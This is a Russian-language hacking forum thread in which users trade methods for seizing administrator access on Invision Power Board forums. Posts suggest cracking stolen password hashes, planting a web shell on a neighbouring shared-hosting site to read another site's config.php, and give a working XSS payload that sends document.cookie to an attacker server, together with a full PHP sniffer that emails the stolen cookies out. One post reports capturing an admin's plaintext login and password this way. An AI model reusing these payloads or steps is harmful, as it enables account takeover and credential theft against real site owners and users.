![]() |
как получить админские сессии в Ipb 2.0.4?
А есть какой нибудь эксплойт или способ получить админские сессии в Ipb 2.0.4.?
|
Попробуй скачать сплоит с www.rst.void.ru
Он тебе выдаст хэш с какойто двойной зашифровкой. Если с ним позаморачиваться то можно узнать хэш который легко расшифровывается в PasswordPro И уже с пасом можешь бороздить по админским просторам :) |
Exploit DO 2.0.4, v 2.0.4 vrode netu sqlinj
|
2 Барсик
я не совсем поняла? всмысле так я получу хеш пасса админа с солью? дык он у меня уже есть :-) бручу уже третьи сутки :-))) и очень сомневаюсь что расбручу. у меня немного другая заморочка- как поиметь доступ к админской панели без расшифрованого пасса ))))) |
2Green_Bear
извини я немного туплю, но что ты сказал? :-D вторую чать я поняла, что в 2.0.4 sqlиньекций нету, а вот что это такое - Exploit DO 2.0.4? это так експлойт называется? :-))) и если да, то чето я в поисковике ничего похожего найти пока немогу |
Цитата:
|
Цитата:
до 2.0.4 < 2.04 |
ну хорошо. что то у меня досих пор ничего не получается. какие вообще есть варианты получения админки в форумах (неважно каких) без расшифрованого пасса?
|
Цитата:
|
2Azazel
угу. спасибо. тогда уж удьте так любезны, если вдруг тут обсуждлось нечто подобное, киньте хоть название топика. потому что по поисковику тут я не нашла. а весь форум читать буду очень долго |
>>> форум читать буду очень долго
Долго, но полезно :-) А насчёт ссылочки - ну не описывается это всё нигде в одной теме + от многих вещей зависит. Это же всё-таки не инструкция к микроволновой печке. :) |
ехххх... ну и на том спасибо... хотя для человека который всего неделю назад узнал что такое експлойт и что такое командная строка - слишком много иноформации ((((
|
2Azazel
мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила? |
Цитата:
|
Цитата:
|
это называется атака через соседа,помню в каком то номере журнала хакер была такая тема =).
|
через шелл не пробовала и не буду. чтобы получить доступ к базе, надо хотябы знать ее название, рута и пасс...короче инахх (((
|
Зря ты так. Заливаем шелл на тот же сервак. Выполняем комманду pwd
Получаем примерно /my/seycas/na/site/111/www/html/ Потом пишем cat /my/seycas/na/site/222/www/html/config.php и получаем то что ты хочешь знать. Теоретически - это сработает. Практически, зависит от сервера. |
как делал я
Если форум поддерживает закачку html фаиликов к топикам то простой выход это - создаем топик(с максимально популярной темой) внутри которого находиться строчка типа: <script language=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>
затем заливаем на сервак который указали: фаилик test.php(c интересной историей например): <?php if(isset($QUERY_STRING)); { $date=date('d.m.y:H:i:s'); mail("ваше@мыло.ru","New Coookie","Date and Time:$date\nIP:$REMOTE_ADDR\nAdress:$HTTP_REFERER\ nCookie:$QUERY_STRING"); } header('Content-Type=text/html\n\n\n\n'); echo "<html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1251\"><title>story</title></head><body><pre>" . "Есть у меня друг Костя, большой любитель представительниц женского пола.\n" . "Если мы шли гулять и Костя не трахнул новую девушку - то вечер считался\n" . "прожитым зря. И вот однажды на дискотеке Костя встретил ЕЁ. ОНА была\n" . "достаточно симпатичной особой, к тому же, как и Костя, разведенной.\n" . "Спустя месяц Костя сообщил мне, что собирается на НЕЙ жениться. Мало\n" . "того, он сообщил, что \"завязал\", что уже давно не ходит по барам и\n" . "вообще больше \"баб не цепляет\".\n" . " \n" . "Гоша Севастопольский" . "</pre></body></html>"; ?> в результате на мыло приходят cookies с хешами паролей )) просто и сердито. Естественно удача тут очень сильно влияет |
Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/tyui.gif ,то как будет выглядеть эта строка
<scriptlanguage=JavaScript>document.location.href= "http://www.vash_server.ru/test.php?"+document.cookie</script> |
Цитата:
|
Цитата:
|
а кто нибудь пробовал чтонибудь делать с аттачментами, которые пишутся в папку uploads? там проблема в том, что расширение мняется или в чем то еще? это я к тому что можно ли както аттачментом залить шелл, а потом его както использовать?
|
АХТУНГ!!!
Не знаю как для кого, но для меня было потрясающей
новостью, что при использовании хсс ко мне пришли куки админа, содержащие логин и пасс в ОТКРЫТОМ виде. (Атаковался IPB 2.0.1) ------------------------------------- Код:
IP: *.*.*.100 Как так получилось? Ответ: В том случае если админ лезет модерировать форум и видит вашу мессагу, к вам придет логин и пасс в открытом виде. Проверено-канает. |
| Время: 05:21 |